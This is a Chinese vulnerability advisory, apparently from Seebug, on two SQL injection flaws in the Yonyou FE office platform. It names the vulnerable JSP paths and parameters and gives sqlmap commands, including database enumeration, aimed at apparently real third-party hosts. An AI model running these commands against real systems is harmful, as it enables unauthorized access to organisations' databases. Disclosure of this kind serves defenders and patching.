用友FE办公平台通用SQL注入(2个)

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: 用友FE办公平台通用SQL注入(2个) ### 详细说明: SQL注入1 漏洞文件及参数 /witapprovemanage/report/depReimburse.jsp?depid=1 漏洞证明: sqlmap.py -u "http://oa.shunhengli.com:9090/witapprovemanage/report/depReimburse.jsp?depid=1" [<img src="https://images.seebug.org/upload/201409/0123020057c21f11c441862e0b5db876ef3b3f74.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/0123020057c21f11c441862e0b5db876ef3b3f74.jpg) sqlmap.py -u "http://oa.shunhengli.com:9090/witapprovemanage/report/depReimburse.jsp?depid=1" --dbs [<img src="https://images.seebug.org/upload/201409/01230211a7cddb3697d74d15d6572a04661b3f2e.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/01230211a7cddb3697d74d15d6572a04661b3f2e.jpg) SQL注入二: 漏洞及参数 /system/monitorright/monitor_right_add.jsp?id=1 漏洞利用证明 sqlmap.py -u "http://oa.hzuf.com:9090/system/monitorright/monitor_right_add.jsp?id=1" [<img...

0%

漏洞利用/PoC

暂无可用Exp或PoC

受影响的平台与产品

当前有0条受影响产品信息